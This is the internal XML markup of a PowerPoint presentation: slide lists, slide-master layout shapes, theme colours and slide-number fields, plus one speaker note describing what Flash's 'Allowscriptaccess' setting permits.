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750" r:id="rId2"/>
    <p:sldMasterId id="2147483764" r:id="rId3"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId44"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId45"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="560" r:id="rId4"/>
    <p:sldId id="570" r:id="rId5"/>
    <p:sldId id="661" r:id="rId6"/>
    <p:sldId id="662" r:id="rId7"/>
    <p:sldId id="663" r:id="rId8"/>
    <p:sldId id="664" r:id="rId9"/>
    <p:sldId id="576" r:id="rId10"/>
    <p:sldId id="561" r:id="rId11"/>
    <p:sldId id="562" r:id="rId12"/>
    <p:sldId id="658" r:id="rId13"/>
    <p:sldId id="568" r:id="rId14"/>
    <p:sldId id="569" r:id="rId15"/>
    <p:sldId id="566" r:id="rId16"/>
    <p:sldId id="567" r:id="rId17"/>
    <p:sldId id="656" r:id="rId18"/>
    <p:sldId id="597" r:id="rId19"/>
    <p:sldId id="599" r:id="rId20"/>
    <p:sldId id="600" r:id="rId21"/>
    <p:sldId id="601" r:id="rId22"/>
    <p:sldId id="565" r:id="rId23"/>
    <p:sldId id="588" r:id="rId24"/>
    <p:sldId id="602" r:id="rId25"/>
    <p:sldId id="604" r:id="rId26"/>
    <p:sldId id="603" r:id="rId27"/>
    <p:sldId id="605" r:id="rId28"/>
    <p:sldId id="595" r:id="rId29"/>
    <p:sldId id="606" r:id="rId30"/>
    <p:sldId id="563" r:id="rId31"/>
    <p:sldId id="610" r:id="rId32"/>
    <p:sldId id="659" r:id="rId33"/>
    <p:sldId id="699" r:id="rId34"/>
    <p:sldId id="682" r:id="rId35"/>
    <p:sldId id="665" r:id="rId36"/>
    <p:sldId id="666" r:id="rId37"/>
    <p:sldId id="667" r:id="rId38"/>
    <p:sldId id="668" r:id="rId39"/>
    <p:sldId id="669" r:id="rId40"/>
    <p:sldId id="670" r:id="rId41"/>
    <p:sldId id="671" r:id="rId42"/>
    <p:sldId id="675" r:id="rId4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FF9900"/>
    <a:srgbClr val="CC3300"/>
    <a:srgbClr val="9999FF"/>
    <a:srgbClr val="808080"/>
    <a:srgbClr val="869406"/>
    <a:srgbClr val="666699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6647" autoAdjust="0"/>
    <p:restoredTop sz="94592" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="105" d="100"/>
          <a:sy n="105" d="100"/>
        </p:scale>
        <p:origin x="-1112" y="-96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-1914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8D74864-EB05-49AA-BA59-F6F5B3173B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35E1360-550A-4529-B4D2-5DC013EF65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997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1DD2A54E-7F4A-4F8D-A2BF-E3597AA6488F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:pPr defTabSz="965200"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
              <a:cs typeface="ヒラギノ角ゴ ProN W3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6381CE-79EE-4B91-90B2-53CD43D08136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6788"/>
            <a:fld id="{87D655A4-9836-418D-A32F-B201A5C1FF76}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"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072"/>
            <a:fld id="{27E7930D-2DFC-4A78-8D90-C5FA6AF73AAF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="965072"/>
              <a:t>10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6C6A965A-ACD5-4A3F-ADC5-CAF86F6BCB51}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="965200"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D8F60AA1-4A90-48DC-BEF0-CB42F8058452}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="965200"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B4C7B-B852-4000-BA8B-C9DA288BA792}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>17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6788"/>
            <a:fld id="{C24E73DC-F075-4293-9626-6E109DDD83F6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"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Allowscriptaccess:   alows flash object to communicate with external scripts, navigate frames, and open windows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067274-9BDE-4C79-90CE-228DCCF141ED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6788"/>
            <a:fld id="{53FFE947-B96B-4BD9-9503-1AFDA9018BFF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"/>
              <a:t>26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69123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69124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020C872-3BC4-4E8F-8435-60B84CF2BB6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069060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4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069062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3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4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5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6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7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8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69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0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1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2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3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4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5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6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7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8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79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0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1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2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3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4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5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6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7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8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89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0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1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2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3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4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5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6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7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8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099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0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1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2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3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4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5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6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7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8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09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10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11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9112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</p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1069113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5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069115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9116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9117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9118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6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1069120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9121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9122" name="Arc 1090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069123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69124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69125" name="Rectangle 109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smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069126" name="Rectangle 109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smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069127" name="Rectangle 109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BE448B4-4CCC-4564-AAC6-8BAFB71823A3}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0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0574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60198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38200" y="1524000"/>
            <a:ext cx="8001000" cy="5257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924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9243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  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="4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40458C"/>
                  </a:solidFill>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5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40458C"/>
                  </a:solidFill>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128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40458C"/>
                  </a:solidFill>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128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40458C"/>
                  </a:solidFill>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                </a:endParaRPr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  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6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40458C"/>
                  </a:solidFill>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128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40458C"/>
                  </a:solidFill>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                </a:endParaRPr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  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069123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69124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smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr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smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr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FF07E4F-DE23-47CB-8EA0-3280D72B6049}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128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04800"/>
            <a:ext cx="19621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7340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theme" Target="../theme/theme2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38.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme3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2060" name="Group 4"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"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68037" name="Line 5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38" name="Line 6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39" name="Line 7"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 8"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 9"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 10"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 11"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 12"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 13"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 14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7" name="Line 15"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 16"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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9" name="Line 17"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 18"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 19"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 20"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 21"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 23"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 24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7" name="Line 25"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 26"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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61" name="Group 27"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"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68060" name="Line 28"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 29"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 31"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 32"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 33"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 34"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 35"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 36"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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9" name="Line 37"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 38"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 39"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 40"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 41"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 42"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 43"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 44"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 45"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 46"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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9" name="Line 47"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 48"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 49"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 50"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 51"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 52"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 53"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 54"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 55"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1068089" name="Rectangle 57" descr="60%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8090" name="Line 58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6" name="Group 59"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"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68092" name="Line 60"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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8093" name="Line 61"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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8094" name="Arc 62"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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05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-7620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 userDrawn="1"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68037" name="Line 5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38" name="Line 6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39" name="Line 7"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 8"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 9"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 10"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 11"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 12"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 13"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 14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7" name="Line 15"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 16"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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49" name="Line 17"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 18"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 19"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 20"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 21"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 23"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 24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7" name="Line 25"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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58" name="Line 26"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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 userDrawn="1"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68060" name="Line 28"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 29"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 31"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 32"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 33"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 34"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 35"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 36"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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69" name="Line 37"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 38"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 39"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 40"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 41"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 42"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 43"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 44"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 45"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 46"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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79" name="Line 47"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 48"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 49"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 50"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 51"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 52"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 53"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 54"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 55"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1068088" name="Line 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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mtClean="0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1068089" name="Rectangle 57" descr="60%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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068090" name="Line 58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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 59"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"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68092" name="Line 60"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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8093" name="Line 61"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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  <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1068094" name="Arc 62"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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1068095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68096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524000"/>
            <a:ext cx="8001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 userDrawn="1"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68037" name="Line 5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38" name="Line 6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39" name="Line 7"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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40" name="Line 8"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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41" name="Line 9"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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42" name="Line 10"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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43" name="Line 11"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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44" name="Line 12"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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45" name="Line 13"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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46" name="Line 14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47" name="Line 15"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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48" name="Line 16"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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49" name="Line 17"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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50" name="Line 18"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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51" name="Line 19"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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52" name="Line 20"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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53" name="Line 21"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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54" name="Line 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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55" name="Line 23"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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56" name="Line 24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57" name="Line 25"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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58" name="Line 26"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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 userDrawn="1"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68060" name="Line 28"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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61" name="Line 29"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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62" name="Line 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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63" name="Line 31"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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64" name="Line 32"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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65" name="Line 33"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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66" name="Line 34"/>
                <p:cNvSpPr>
